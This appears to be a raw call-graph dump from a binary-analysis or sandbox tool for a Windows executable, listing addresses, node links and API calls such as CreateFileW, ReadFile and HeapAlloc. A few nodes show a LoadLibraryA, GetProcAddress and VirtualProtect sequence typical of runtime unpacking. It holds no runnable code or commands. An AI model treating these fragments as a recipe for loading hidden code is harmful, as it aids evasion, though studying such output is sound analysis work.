92507->92519 92551 7ff6a29c9be8 37 API calls 2 library calls 92507->92551 92508->92506 92547 7ff6a29c4f78 11 API calls _set_fmode 92508->92547 92511 7ff6a29d6876 92511->92519 92552 7ff6a29ca970 IsProcessorFeaturePresent 92511->92552 92513 7ff6a29d6812 92550 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92513->92550 92514 7ff6a29d67c1 92548 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92514->92548 92519->92458 92519->92459 92557 7ff6a29d0348 EnterCriticalSection 92520->92557 92532->92463 92533->92491 92545->92504 92546->92508 92547->92514 92548->92506 92549->92513 92550->92507 92551->92511 92553 7ff6a29ca983 92552->92553 92556 7ff6a29ca684 14 API calls 3 library calls 92553->92556 92555 7ff6a29ca99e GetCurrentProcess TerminateProcess 92556->92555 92559 7ff6a29c053e 92558->92559 92560 7ff6a29c04fe 92558->92560 92559->92560 92562 7ff6a29c054a 92559->92562 92570 7ff6a29ca884 37 API calls 2 library calls 92560->92570 92569 7ff6a29c54dc EnterCriticalSection 92562->92569 92564 7ff6a29c054f 92565 7ff6a29c0658 71 API calls 92564->92565 92566 7ff6a29c0561 92565->92566 92567 7ff6a29c54e8 _fread_nolock LeaveCriticalSection 92566->92567 92568 7ff6a29c0525 92567->92568 92568->92345 92570->92568 92572 7ff6a29c0b7c 92571->92572 92581 7ff6a29c089c 92572->92581 92574 7ff6a29c0b9a 92574->92366 92575->92351 92576->92355 92577->92362 92578->92359 92579->92362 92580->92362 92582 7ff6a29c08e9 92581->92582 92583 7ff6a29c08bc 92581->92583 92582->92574 92583->92582 92584 7ff6a29c08f1 92583->92584 92585 7ff6a29c08c6 92583->92585 92588 7ff6a29c07dc 92584->92588 92595 7ff6a29ca884 37 API calls 2 library calls 92585->92595 92596 7ff6a29c54dc EnterCriticalSection 92588->92596 92590 7ff6a29c07f9 92591 7ff6a29c081c 74 API calls 92590->92591 92592 7ff6a29c0802 92591->92592 92593 7ff6a29c54e8 _fread_nolock LeaveCriticalSection 92592->92593 92594 7ff6a29c080d 92593->92594 92594->92582 92595->92582 92598 7ff6a29bfee1 92597->92598 92599 7ff6a29bfeb3 92597->92599 92603 7ff6a29bfed3 92598->92603 92607 7ff6a29c54dc EnterCriticalSection 92598->92607 92608 7ff6a29ca884 37 API calls 2 library calls 92599->92608 92602 7ff6a29bfef8 92604 7ff6a29bff14 72 API calls 92602->92604 92603->92371 92605 7ff6a29bff04 92604->92605 92606 7ff6a29c54e8 _fread_nolock LeaveCriticalSection 92605->92606 92606->92603 92608->92603 92610 7ff6a29c0424 92609->92610 92611 7ff6a29c0456 92609->92611 92610->92305 92611->92610 92612 7ff6a29c0465 memcpy_s 92611->92612 92613 7ff6a29c04a2 92611->92613 92623 7ff6a29c4f78 11 API calls _set_fmode 92612->92623 92622 7ff6a29c54dc EnterCriticalSection 92613->92622 92616 7ff6a29c04aa 92618 7ff6a29c01ac _fread_nolock 51 API calls 92616->92618 92617 7ff6a29c047a 92624 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92617->92624 92620 7ff6a29c04c1 92618->92620 92621 7ff6a29c54e8 _fread_nolock LeaveCriticalSection 92620->92621 92621->92610 92623->92617 92624->92610 92626 7ff6a29c4a4e 92625->92626 92627 7ff6a29c4a73 92626->92627 92629 7ff6a29c4aaf 92626->92629 92643 7ff6a29ca884 37 API calls 2 library calls 92627->92643 92644 7ff6a29c2c80 49 API calls _invalid_parameter_noinfo 92629->92644 92631 7ff6a29c4a9d 92633 7ff6a29bc5c0 _log10_special 8 API calls 92631->92633 92632 7ff6a29c4b8c 92634 7ff6a29ca9b8 __free_lconv_mon 11 API calls 92632->92634 92635 7ff6a29b1cc8 92633->92635 92634->92631 92635->92268 92636 7ff6a29c4b46 92636->92632 92637 7ff6a29c4b61 92636->92637 92638 7ff6a29c4bb0 92636->92638 92641 7ff6a29c4b58 92636->92641 92645 7ff6a29ca9b8 92637->92645 92638->92632 92639 7ff6a29c4bba 92638->92639 92642 7ff6a29ca9b8 __free_lconv_mon 11 API calls 92639->92642 92641->92632 92641->92637 92642->92631 92643->92631 92644->92636 92646 7ff6a29ca9ec 92645->92646 92647 7ff6a29ca9bd HeapFree 92645->92647 92646->92631 92647->92646 92648 7ff6a29ca9d8 GetLastError 92647->92648 92649 7ff6a29ca9e5 __free_lconv_mon 92648->92649 92651 7ff6a29c4f78 11 API calls _set_fmode 92649->92651 92651->92646 92652->92322 92654 7ff6a29c5698 92655 7ff6a29c56cf 92654->92655 92656 7ff6a29c56b2 92654->92656 92655->92656 92657 7ff6a29c56e2 CreateFileW 92655->92657 92705 7ff6a29c4f58 11 API calls _set_fmode 92656->92705 92659 7ff6a29c5716 92657->92659 92660 7ff6a29c574c 92657->92660 92679 7ff6a29c57ec GetFileType 92659->92679 92708 7ff6a29c5c74 46 API calls 3 library calls 92660->92708 92661 7ff6a29c56b7 92706 7ff6a29c4f78 11 API calls _set_fmode 92661->92706 92666 7ff6a29c5751 92671 7ff6a29c5780 92666->92671 92672 7ff6a29c5755 92666->92672 92667 7ff6a29c56bf 92707 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92667->92707 92669 7ff6a29c5741 CloseHandle 92674 7ff6a29c56ca 92669->92674 92670 7ff6a29c572b CloseHandle 92670->92674 92710 7ff6a29c5a34 92671->92710 92709 7ff6a29c4eec 11 API calls 2 library calls 92672->92709 92677 7ff6a29c575f 92677->92674 92680 7ff6a29c58f7 92679->92680 92681 7ff6a29c583a 92679->92681 92683 7ff6a29c5921 92680->92683 92684 7ff6a29c58ff 92680->92684 92682 7ff6a29c5866 GetFileInformationByHandle 92681->92682 92728 7ff6a29c5b70 21 API calls _fread_nolock 92681->92728 92686 7ff6a29c588f 92682->92686 92687 7ff6a29c5912 GetLastError 92682->92687 92689 7ff6a29c5944 PeekNamedPipe 92683->92689 92703 7ff6a29c58e2 92683->92703 92684->92687 92688 7ff6a29c5903 92684->92688 92690 7ff6a29c5a34 51 API calls 92686->92690 92731 7ff6a29c4eec 11 API calls 2 library calls 92687->92731 92730 7ff6a29c4f78 11 API calls _set_fmode 92688->92730 92689->92703 92695 7ff6a29c589a 92690->92695 92693 7ff6a29bc5c0 _log10_special 8 API calls 92696 7ff6a29c5724 92693->92696 92694 7ff6a29c5854 92694->92682 92694->92703 92721 7ff6a29c5994 92695->92721 92696->92669 92696->92670 92699 7ff6a29c5994 10 API calls 92700 7ff6a29c58b9 92699->92700 92701 7ff6a29c5994 10 API calls 92700->92701 92702 7ff6a29c58ca 92701->92702 92702->92703 92729 7ff6a29c4f78 11 API calls _set_fmode 92702->92729 92703->92693 92705->92661 92706->92667 92707->92674 92708->92666 92709->92677 92712 7ff6a29c5a5c 92710->92712 92711 7ff6a29c578d 92720 7ff6a29c5b70 21 API calls _fread_nolock 92711->92720 92712->92711 92732 7ff6a29cf794 51 API calls 2 library calls 92712->92732 92714 7ff6a29c5af0 92714->92711 92733 7ff6a29cf794 51 API calls 2 library calls 92714->92733 92716 7ff6a29c5b03 92716->92711 92734 7ff6a29cf794 51 API calls 2 library calls 92716->92734 92718 7ff6a29c5b16 92718->92711 92735 7ff6a29cf794 51 API calls 2 library calls 92718->92735 92720->92677 92722 7ff6a29c59b0 92721->92722 92723 7ff6a29c59bd FileTimeToSystemTime 92721->92723 92722->92723 92725 7ff6a29c59b8 92722->92725 92724 7ff6a29c59d1 SystemTimeToTzSpecificLocalTime 92723->92724 92723->92725 92724->92725 92726 7ff6a29bc5c0 _log10_special 8 API calls 92725->92726 92727 7ff6a29c58a9 92726->92727 92727->92699 92728->92694 92729->92703 92730->92703 92731->92703 92732->92714 92733->92716 92734->92718 92735->92711 92736 7ff8a8030330 92743 7ff8a8030f10 92736->92743 92744 7ff8a8030348 92736->92744 92737 7ff8a8030e33 LoadLibraryA 92738 7ff8a8030e4d 92737->92738 92739 7ff8a8030e56 GetProcAddress 92738->92739 92738->92744 92739->92738 92741 7ff8a8030e77 92739->92741 92742 7ff8a8030e82 VirtualProtect VirtualProtect 92742->92743 92743->92743 92744->92737 92744->92742 92745 7ff6a29cf9fc 92746 7ff6a29cfbee 92745->92746 92748 7ff6a29cfa3e _isindst 92745->92748 92791 7ff6a29c4f78 11 API calls _set_fmode 92746->92791 92748->92746 92751 7ff6a29cfabe _isindst 92748->92751 92749 7ff6a29bc5c0 _log10_special 8 API calls 92750 7ff6a29cfc09 92749->92750 92766 7ff6a29d6204 92751->92766 92756 7ff6a29cfc1a 92757 7ff6a29ca970 _isindst 17 API calls 92756->92757 92759 7ff6a29cfc2e 92757->92759 92763 7ff6a29cfb1b 92764 7ff6a29cfbde 92763->92764 92790 7ff6a29d6248 37 API calls _isindst 92763->92790 92764->92749 92767 7ff6a29d6213 92766->92767 92768 7ff6a29cfadc 92766->92768 92792 7ff6a29d0348 EnterCriticalSection 92767->92792 92772 7ff6a29d5608 92768->92772 92770 7ff6a29d621b 92770->92768 92771 7ff6a29d6074 55 API calls 92770->92771 92771->92768 92773 7ff6a29d5611 92772->92773 92774 7ff6a29cfaf1 92772->92774 92793 7ff6a29c4f78 11 API calls _set_fmode 92773->92793 92774->92756 92778 7ff6a29d5638 92774->92778 92776 7ff6a29d5616 92794 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92776->92794 92779 7ff6a29d5641 92778->92779 92780 7ff6a29cfb02 92778->92780 92795 7ff6a29c4f78 11 API calls _set_fmode 92779->92795 92780->92756 92784 7ff6a29d5668 92780->92784 92782 7ff6a29d5646 92796 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92782->92796 92785 7ff6a29d5671 92784->92785 92786 7ff6a29cfb13 92784->92786 92797 7ff6a29c4f78 11 API calls _set_fmode 92785->92797 92786->92756 92786->92763 92788 7ff6a29d5676 92798 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92788->92798 92790->92764 92791->92764 92793->92776 92794->92774 92795->92782 92796->92780 92797->92788 92798->92786 92799 7ff8a868fb8b 92802 7ff8a868fba9 92799->92802 92800 7ff8a86922f9 92811 7ff8a8681eb0 7 API calls 92800->92811 92801 7ff8a8691b7d 92808 7ff8a86920c4 92801->92808 92812 7ff8a8681eb0 7 API calls 92801->92812 92802->92800 92802->92801 92806 7ff8a869181c 92802->92806 92805 7ff8a8692517 92806->92806 92810 7ff8a86920f7 92808->92810 92813 7ff8a8782920 92808->92813 92809 7ff8a86926d3 92811->92805 92812->92808 92814 7ff8a8782929 92813->92814 92815 7ff8a8782974 IsProcessorFeaturePresent 92814->92815 92816 7ff8a8782934 92814->92816 92817 7ff8a878298c 92815->92817 92816->92809 92820 7ff8a8782b6c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 92817->92820 92819 7ff8a878299f 92819->92809 92820->92819 92821 7ff8a8068150 92823 7ff8a806816a 92821->92823 92822 7ff8a8068180 92823->92822 92825 7ff8a804112c 92823->92825 92825->92822 92826 7ff8a804ef00 92825->92826 92829 7ff8a804ef30 92826->92829 92828 7ff8a804ef1a 92828->92822 92830 7ff8a8041325 92829->92830 92831 7ff8a804ef50 SetLastError 92830->92831 92832 7ff8a804ef70 92831->92832 92835 7ff8a8041c1c 92832->92835 92833 7ff8a804efac 92833->92828 92835->92833 92836 7ff8a8086e20 92835->92836 92838 7ff8a8086eec 92836->92838 92842 7ff8a8041a0f 92836->92842 92852 7ff8a80414bf 92836->92852 92856 7ff8a8041df7 92836->92856 92860 7ff8a809f070 92836->92860 92838->92833 92842->92836 92845 7ff8a808ab70 92842->92845 92843 7ff8a80414f1 SetLastError 92843->92845 92844 7ff8a808b8b6 92846 7ff8a808b8e1 00007FF8C6126570 92844->92846 92851 7ff8a808ace7 92844->92851 92845->92843 92845->92844 92845->92851 92847 7ff8a808b906 00007FF8C6126570 92846->92847 92846->92851 92848 7ff8a808b926 00007FF8C6126570 92847->92848 92847->92851 92849 7ff8a808b93d 00007FF8C6126570 92848->92849 92848->92851 92850 7ff8a808b957 00007FF8C6126570 92849->92850 92849->92851 92850->92851 92851->92836 92852->92836 92853 7ff8a809e960 92852->92853 92854 7ff8a809f1c1 SetLastError 92853->92854 92855 7ff8a809f1d5 92853->92855 92854->92855 92855->92836 92856->92836 92857 7ff8a809eaa0 92856->92857 92858 7ff8a809f1c1 SetLastError 92857->92858 92859 7ff8a809f1d5 92857->92859 92858->92859 92859->92836 92861 7ff8a809f180 92860->92861 92862 7ff8a809f1c1 SetLastError 92861->92862 92863 7ff8a809f1d5 92861->92863 92862->92863 92863->92836 92864 7ff8a8068e70 92865 7ff8a8068e8a 92864->92865 92866 7ff8a8068ea0 92865->92866 92868 7ff8a804204a 92865->92868 92868->92866 92869 7ff8a804f370 92868->92869 92870 7ff8a804f38a SetLastError 92869->92870 92871 7ff8a804f3aa 92870->92871 92872 7ff8a804f3ce 92871->92872 92874 7ff8a80424aa 92871->92874 92872->92866 92874->92872 92877 7ff8a8088010 92874->92877 92875 7ff8a808820f 92875->92872 92877->92875 92878 7ff8a8088154 92877->92878 92880 7ff8a804127b 92877->92880 92878->92875 92879 7ff8a804127b SetLastError 92878->92879 92879->92878 92880->92878 92882 7ff8a8088a40 92880->92882 92881 7ff8a8088ac3 SetLastError 92881->92882 92883 7ff8a8088b27 92881->92883 92882->92881 92882->92883 92883->92878 92884 7ff6a29bbb50 92885 7ff6a29bbb7e 92884->92885 92886 7ff6a29bbb65 92884->92886 92886->92885 92889 7ff6a29cd66c 92886->92889 92890 7ff6a29cd6b7 92889->92890 92895 7ff6a29cd67b _set_fmode 92889->92895 92897 7ff6a29c4f78 11 API calls _set_fmode 92890->92897 92891 7ff6a29cd69e HeapAlloc 92893 7ff6a29bbbde 92891->92893 92891->92895 92895->92890 92895->92891 92896 7ff6a29d3600 EnterCriticalSection LeaveCriticalSection _set_fmode 92895->92896 92896->92895 92897->92893 92898 7ff8a86b29e0 92900 7ff8a86b2a1f 92898->92900 92905 7ff8a86b2e43 92898->92905 92899 7ff8a86b2d3e 00007FF8B9F73010 92902 7ff8a86b2d6a 92899->92902 92900->92899 92900->92905 92903 7ff8a86b2ebb 92902->92903 92902->92905 92906 7ff8a8656940 92902->92906 92903->92903 92904 7ff8a86b2f79 00007FF8B9F73010 92903->92904 92903->92905 92904->92905 92907 7ff8a86569f1 92906->92907 92908 7ff8a865695a 92906->92908 92907->92903 92909 7ff8a865699a 00007FF8B9F73010 92908->92909 92910 7ff8a86569aa 92908->92910 92909->92910 92910->92903 92911 7ff8a80b15a0 92913 7ff8a80b15b8 92911->92913 92912 7ff8a80b16c6 92913->92912 92914 7ff8a8041c1c 9 API calls 92913->92914 92914->92913 92915 7ff8a86b0da0 92916 7ff8a86b0dcc 92915->92916 92921 7ff8a86b0dd1 92915->92921 92923 7ff8a86d49e0 92916->92923 92918 7ff8a86b0ed4 92919 7ff8a86b0ec1 92919->92918 92928 7ff8a86f0040 11 API calls 92919->92928 92921->92918 92921->92919 92927 7ff8a86ee1f0 00007FF8B9F73010 92921->92927 92924 7ff8a86d49f9 92923->92924 92926 7ff8a86d4a05 92923->92926 92929 7ff8a86d4910 92924->92929 92926->92921 92927->92919 92928->92918 92930 7ff8a86d494a 92929->92930 92933 7ff8a86d495a 92929->92933 92935 7ff8a86d4450 92930->92935 92932 7ff8a86d49ad 92932->92926 92933->92932 92934 7ff8a86d4450 19 API calls 92933->92934 92934->92933 92951 7ff8a86d4150 92935->92951 92937 7ff8a86d450c 92942 7ff8a86d453a 92937->92942 92945 7ff8a86d45f8 92937->92945 92966 7ff8a8673820 92937->92966 92938 7ff8a8782920 4 API calls 92939 7ff8a86d48fb 92938->92939 92939->92933 92941 7ff8a86d4594 92943 7ff8a86d459a 92941->92943 92941->92945 92942->92938 92943->92942 92944 7ff8a86d45cf 00007FF8B9F73010 92943->92944 92944->92942 92950 7ff8a86d4681 92945->92950 92971 7ff8a8659180 92945->92971 92950->92942 92983 7ff8a8674c10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 92950->92983 92952 7ff8a86d4172 92951->92952 92965 7ff8a86d428b 92951->92965 92953 7ff8a86d417b 92952->92953 92956 7ff8a86d4193 92952->92956 92999 7ff8a86d4040 7 API calls 92953->92999 92955 7ff8a86d4186 92955->92937 92958 7ff8a86d41d2 92956->92958 92962 7ff8a86d4383 92956->92962 92959 7ff8a86d4224 92958->92959 93000 7ff8a86d4040 7 API calls 92958->93000 92984 7ff8a86d4cf0 92959->92984 92962->92965 93002 7ff8a86d4040 7 API calls 92962->93002 92963 7ff8a86d4262 92963->92965 93001 7ff8a86d4040 7 API calls 92963->93001 92965->92937 92969 7ff8a8673857 92966->92969 92967 7ff8a86738b9 92967->92941 92969->92967 93010 7ff8a8673400 92969->93010 93017 7ff8a8667280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 92969->93017 93049 7ff8a86590b0 92971->93049 92974 7ff8a86ccfb0 92975 7ff8a86ccfdd 92974->92975 92981 7ff8a86ccfe6 92974->92981 92975->92950 92978 7ff8a86cd5f4 92978->92950 92979 7ff8a86cd45d 92979->92978 92980 7ff8a86cd61d 00007FF8B9F73010 92979->92980 92980->92978 92981->92975 92981->92979 92982 7ff8a86d4150 13 API calls 92981->92982 93070 7ff8a86d52a0 92981->93070 93075 7ff8a8688ff0 92981->93075 92982->92981 92983->92942 92992 7ff8a86d4d64 92984->92992 92985 7ff8a86d4fbb 93003 7ff8a870fcf0 92985->93003 92987 7ff8a8782920 4 API calls 92988 7ff8a86d5287 92987->92988 92988->92963 92989 7ff8a86d4f2a 92990 7ff8a86d4f74 00007FF8B9F73010 92989->92990 92993 7ff8a86d4f94 92989->92993 92994 7ff8a86d4ddf 92989->92994 92991 7ff8a870fcf0 7 API calls 92990->92991 92991->92993 92992->92985 92992->92989 92992->92994 92995 7ff8a86d5025 00007FF8B9F73010 92993->92995 92997 7ff8a86d503a 92993->92997 92994->92987 92995->92997 92996 7ff8a8673820 8 API calls 92996->92997 92997->92994 92997->92996 93009 7ff8a8674c10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 92997->93009 92999->92955 93000->92959 93001->92965 93002->92965 93004 7ff8a870fd41 93003->93004 93005 7ff8a8710160 93004->93005 93006 7ff8a8659180 7 API calls 93004->93006 93007 7ff8a8782920 4 API calls 93005->93007 93006->93005 93008 7ff8a87102c0 93007->93008 93008->92993 93009->92997 93018 7ff8a8669d10 93010->93018 93014 7ff8a8673432 93015 7ff8a8673534 93014->93015 93032 7ff8a8667280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 93014->93032 93015->92969 93017->92969 93021 7ff8a8669d40 93018->93021 93024 7ff8a8669dd1 93018->93024 93019 7ff8a8782920 4 API calls 93020 7ff8a866a0c9 93019->93020 93020->93015 93026 7ff8a866a0e0 93020->93026 93022 7ff8a8669ed5 93021->93022 93021->93024 93040 7ff8a8667ca0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 93021->93040 93022->93024 93033 7ff8a865d9f0 93022->93033 93024->93019 93028 7ff8a866a135 93026->93028 93030 7ff8a866a102 93026->93030 93028->93030 93031 7ff8a866a16d 93028->93031 93041 7ff8a8668060 93028->93041 93030->93014 93031->93030 93047 7ff8a8667280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 93031->93047 93032->93015 93034 7ff8a865da1d 93033->93034 93039 7ff8a865da6a 93033->93039 93035 7ff8a865da53 00007FF8B9F73010 93034->93035 93036 7ff8a865da33 00007FF8B9F73010 93034->93036 93035->93039 93038 7ff8a865da38 93036->93038 93037 7ff8a865da93 ReadFile 93037->93038 93037->93039 93038->93024 93039->93037 93039->93038 93040->93022 93042 7ff8a866808f 93041->93042 93043 7ff8a866809c 93041->93043 93048 7ff8a866f040 RaiseException IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 93042->93048 93045 7ff8a86680ac 93043->93045 93046 7ff8a865d9f0 3 API calls 93043->93046 93045->93031 93046->93045 93047->93030 93048->93043 93056 7ff8a8656ec0 93049->93056 93052 7ff8a8659136 93053 7ff8a8782920 4 API calls 93052->93053 93054 7ff8a8659162 93053->93054 93054->92974 93059 7ff8a8656f09 93056->93059 93057 7ff8a8782920 4 API calls 93058 7ff8a8658643 93057->93058 93058->93052 93067 7ff8a8658cd0 00007FF8B9F73010 93058->93067 93061 7ff8a8658606 93059->93061 93062 7ff8a8656f93 93059->93062 93063 7ff8a8656f83 93059->93063 93066 7ff8a8656f91 93059->93066 93061->93057 93064 7ff8a8656f97 00007FF8B9F73010 93062->93064 93062->93066 93068 7ff8a8658c00 00007FF8B9F73010 93063->93068 93064->93066 93066->93061 93069 7ff8a8658c00 00007FF8B9F73010 93066->93069 93067->93052 93068->93066 93069->93061 93072 7ff8a86d532e 93070->93072 93073 7ff8a86d52d8 93070->93073 93071 7ff8a86d4cf0 13 API calls 93071->93072 93072->93071 93072->93073 93084 7ff8a86bb0c0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 93072->93084 93073->92981 93076 7ff8a8689004 93075->93076 93077 7ff8a8689017 93075->93077 93076->92981 93077->93076 93085 7ff8a8688d60 93077->93085 93079 7ff8a8689095 93080 7ff8a8688d60 10 API calls 93079->93080 93081 7ff8a86890f1 93079->93081 93082 7ff8a86890f6 93079->93082 93080->93079 93081->92981 93082->93081 93083 7ff8a8689183 00007FF8B9F73010 93082->93083 93083->93081 93084->93072 93090 7ff8a8688d7d 93085->93090 93086 7ff8a8688e55 93092 7ff8a868bdc0 93086->93092 93087 7ff8a8688e4e 93097 7ff8a8683ec0 10 API calls 93087->93097 93090->93086 93090->93087 93091 7ff8a8688da5 93090->93091 93091->93079 93093 7ff8a868be56 93092->93093 93096 7ff8a868befd 93093->93096 93098 7ff8a8681eb0 7 API calls 93093->93098 93095 7ff8a8692517 93095->93091 93097->93091 93098->93095 93099 7ff8a868e926 93101 7ff8a868e933 93099->93101 93100 7ff8a868e987 93102 7ff8a868e9bf 93100->93102 93105 7ff8a86924fb 93100->93105 93111 7ff8a868eace 93100->93111 93101->93100 93130 7ff8a867d2b0 8 API calls 93101->93130 93118 7ff8a86722e0 93102->93118 93133 7ff8a8681eb0 7 API calls 93105->93133 93107 7ff8a868e9e9 93107->93111 93112 7ff8a868ea40 93107->93112 93131 7ff8a867cfe0 00007FF8B9F73010 93107->93131 93108 7ff8a8692517 93115 7ff8a86920c4 93111->93115 93134 7ff8a8681eb0 7 API calls 93111->93134 93112->93111 93132 7ff8a8672c40 9 API calls 93112->93132 93114 7ff8a8782920 4 API calls 93116 7ff8a86926d3 93114->93116 93115->93114 93117 7ff8a86920f7 93115->93117 93122 7ff8a8672334 93118->93122 93119 7ff8a8782920 4 API calls 93120 7ff8a8672473 93119->93120 93120->93107 93124 7ff8a867248f 00007FF8B9F73010 93122->93124 93126 7ff8a867249d 93122->93126 93128 7ff8a8672456 93122->93128 93123 7ff8a86726f5 93127 7ff8a867276e 93123->93127 93129 7ff8a865d9f0 3 API calls 93123->93129 93124->93126 93126->93127 93126->93128 93135 7ff8a86692c0 93126->93135 93127->93128 93146 7ff8a8668a20 9 API calls 93127->93146 93128->93119 93129->93127 93130->93100 93131->93112 93132->93111 93133->93108 93134->93115 93136 7ff8a8669345 93135->93136 93143 7ff8a86693a0 93135->93143 93137 7ff8a8669385 00007FF8B9F73010 93136->93137 93136->93143 93144 7ff8a86695d2 93136->93144 93137->93143 93138 7ff8a8669465 00007FF8B9F73010 93139 7ff8a866963b 93138->93139 93140 7ff8a8669487 00007FF8B9F73010 93138->93140 93141 7ff8a866963e 00007FF8B9F73010 00007FF8B9F73010 93139->93141 93140->93141 93142 7ff8a8669689 93141->93142 93142->93144 93147 7ff8a865ffe0 93142->93147 93143->93138 93143->93142 93143->93143 93143->93144 93144->93123 93146->93128 93152 7ff8a8660031 93147->93152 93149 7ff8a8782920 4 API calls 93150 7ff8a8660657 93149->93150 93150->93144 93151 7ff8a86603b8 93151->93149 93152->93151 93153 7ff8a8660200 CreateFileW 93152->93153 93154 7ff8a865fa20 6 API calls 93152->93154 93153->93152 93154->93152 93155 7ff8a868faa6 93156 7ff8a868fad9 93155->93156 93160 7ff8a868fac4 93155->93160 93166 7ff8a8675de0 93156->93166 93158 7ff8a868fae5 93158->93160 93172 7ff8a8675fd0 93158->93172 93163 7ff8a86920c4 93160->93163 93176 7ff8a8681eb0 7 API calls 93160->93176 93162 7ff8a8782920 4 API calls 93164 7ff8a86926d3 93162->93164 93163->93162 93165 7ff8a86920f7 93163->93165 93167 7ff8a8675eb5 93166->93167 93169 7ff8a8675e07 93166->93169 93170 7ff8a8675eba 93167->93170 93182 7ff8a8671fa0 93167->93182 93169->93170 93177 7ff8a8675bd0 93169->93177 93170->93158 93175 7ff8a8675ff3 93172->93175 93173 7ff8a8676140 93173->93160 93174 7ff8a8671fa0 8 API calls 93174->93175 93175->93173 93175->93174 93176->93163 93178 7ff8a8675c1f 93177->93178 93179 7ff8a8675be6 93177->93179 93180 7ff8a8671fa0 8 API calls 93178->93180 93179->93170 93181 7ff8a8675c6d 93180->93181 93181->93170 93183 7ff8a8671fbd 93182->93183 93184 7ff8a8672004 93182->93184 93183->93169 93186 7ff8a866a0e0 8 API calls 93184->93186 93185 7ff8a8672015 93185->93169 93186->93185 93187 7ff8a8619060 93188 7ff8a8619c01 93187->93188 93195 7ff8a8619078 93187->93195 93189 7ff8a8619b0e LoadLibraryA 93190 7ff8a8619b28 93189->93190 93193 7ff8a8619b47 GetProcAddress 93190->93193 93190->93195 93192 7ff8a8619b69 VirtualProtect VirtualProtect 93192->93188 93193->93190 93194 7ff8a8619b5e 93193->93194 93195->93189 93195->93192 93196 7ff8a805fd40 93197 7ff8a805fd50 93196->93197 93198 7ff8a805fd62 93197->93198 93199 7ff8a809f070 SetLastError 93197->93199 93200 7ff8a80414bf SetLastError 93197->93200 93201 7ff8a8041df7 SetLastError 93197->93201 93199->93198 93200->93198 93201->93198 93202 7ff8a8661240 GetSystemInfo 93203 7ff8a8661274 93202->93203 93204 7ff6a29bccac 93225 7ff6a29bce7c 93204->93225 93207 7ff6a29bcdf8 93374 7ff6a29bd19c 7 API calls 2 library calls 93207->93374 93208 7ff6a29bccc8 __scrt_acquire_startup_lock 93210 7ff6a29bce02 93208->93210 93215 7ff6a29bcce6 __scrt_release_startup_lock 93208->93215 93375 7ff6a29bd19c 7 API calls 2 library calls 93210->93375 93212 7ff6a29bcd0b 93213 7ff6a29bce0d __CxxCallCatchBlock 93214 7ff6a29bcd91 93231 7ff6a29bd2e4 93214->93231 93215->93212 93215->93214 93371 7ff6a29c9b9c 45 API calls 93215->93371 93217 7ff6a29bcd96 93234 7ff6a29b1000 93217->93234 93222 7ff6a29bcdb9 93222->93213 93373 7ff6a29bd000 7 API calls 93222->93373 93224 7ff6a29bcdd0 93224->93212 93226 7ff6a29bce84 93225->93226 93227 7ff6a29bce90 __scrt_dllmain_crt_thread_attach 93226->93227 93228 7ff6a29bccc0 93227->93228 93229 7ff6a29bce9d 93227->93229 93228->93207 93228->93208 93229->93228 93376 7ff6a29bd8f8 7 API calls 2 library calls 93229->93376 93377 7ff6a29da540 93231->93377 93235 7ff6a29b1009 93234->93235 93379 7ff6a29c54f4 93235->93379 93237 7ff6a29b37fb 93386 7ff6a29b36b0 93237->93386 93241 7ff6a29bc5c0 _log10_special 8 API calls 93243 7ff6a29b3ca7 93241->93243 93372 7ff6a29bd328 GetModuleHandleW 93243->93372 93244 7ff6a29b383c 93247 7ff6a29b1c80 49 API calls 93244->93247 93245 7ff6a29b391b 93246 7ff6a29b45b0 108 API calls 93245->93246 93249 7ff6a29b392b 93246->93249 93248 7ff6a29b385b 93247->93248 93458 7ff6a29b8a20 93248->93458 93251 7ff6a29b396a 93249->93251 93481 7ff6a29b7f80 93249->93481 93490 7ff6a29b2710 54 API calls _log10_special 93251->93490 93252 7ff6a29b388e 93262 7ff6a29b38bb __vcrt_freefls 93252->93262 93480 7ff6a29b8b90 40 API calls __vcrt_freefls 93252->93480 93255 7ff6a29b395d 93256 7ff6a29b3984 93255->93256 93257 7ff6a29b3962 93255->93257 93258 7ff6a29b1c80 49 API calls 93256->93258 93260 7ff6a29c00bc 74 API calls 93257->93260 93261 7ff6a29b39a3 93258->93261 93260->93251 93266 7ff6a29b1950 115 API calls 93261->93266 93263 7ff6a29b8a20 14 API calls 93262->93263 93270 7ff6a29b38de __vcrt_freefls 93262->93270 93263->93270 93265 7ff6a29b3a0b 93493 7ff6a29b8b90 40 API calls __vcrt_freefls 93265->93493 93269 7ff6a29b39ce 93266->93269 93268 7ff6a29b3a17 93494 7ff6a29b8b90 40 API calls __vcrt_freefls 93268->93494 93269->93248 93272 7ff6a29b39de 93269->93272 93276 7ff6a29b390e __vcrt_freefls 93270->93276 93492 7ff6a29b8b30 40 API calls __vcrt_freefls 93270->93492 93491 7ff6a29b2710 54 API calls _log10_special 93272->93491 93273 7ff6a29b3a23 93495 7ff6a29b8b90 40 API calls __vcrt_freefls 93273->93495 93277 7ff6a29b8a20 14 API calls 93276->93277 93278 7ff6a29b3a3b 93277->93278 93279 7ff6a29b3b2f 93278->93279 93280 7ff6a29b3a60 __vcrt_freefls 93278->93280 93497 7ff6a29b2710 54 API calls _log10_special 93279->93497 93288 7ff6a29b3aab 93280->93288 93496 7ff6a29b8b30 40 API calls __vcrt_freefls 93280->93496 93282 7ff6a29b3808 __vcrt_freefls 93282->93241 93284 7ff6a29b8a20 14 API calls 93285 7ff6a29b3bf4 __vcrt_freefls 93284->93285 93286 7ff6a29b3d41 